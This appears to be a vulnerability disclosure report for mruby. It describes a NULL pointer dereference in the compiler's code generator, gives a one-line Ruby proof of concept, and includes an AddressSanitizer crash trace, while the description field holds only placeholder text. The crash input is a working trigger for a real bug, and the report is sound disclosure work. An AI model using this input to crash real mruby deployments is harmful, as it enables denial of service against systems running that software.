NULL Pointer Dereference in mruby/mruby
Valid
Reported on Oct 16th 2021
Description
Please enter a description of the vulnerability.
Proof of Concept
super super( )
Result
~/asan/mruby/bin/mruby ~/crash.rb
AddressSanitizer:DEADLYSIGNAL
=================================================================
==18265==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000030 (pc 0x56328e0aed60 bp 0x7ffe1b4f1b20 sp 0x7ffe1b4f16f0 T0)
==18265==The signal is caused by a READ memory access.
==18265==Hint: address points to the zero page.
#0 0x56328e0aed5f in codegen /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2833
#1 0x56328e0a5b03 in gen_values /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:1556
#2 0x56328e0aea4d in codegen /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2807
#3 0x56328e0a904b in codegen /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2100
#4 0x56328e0a52fe in scope_body /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:1466
#5 0x56328e0abb65 in codegen /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2468
#6 0x56328e0b6c22 in generate_code /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:3851
#7 0x56328e0b6ffa in mrb_generate_code /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:3874
#8 0x56328e071718 in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6843
#9 0x56328e071eeb in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6911
#10 0x56328df73092 in main /root/asan/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
#11 0x7f9e2ed870b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#12 0x56328df7042d in _start (/root/asan/mruby/bin/mruby+0xbd42d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2833 in codegen
==18265==ABORTING
We have contacted a member of the mruby team and are waiting to hear back
2 years ago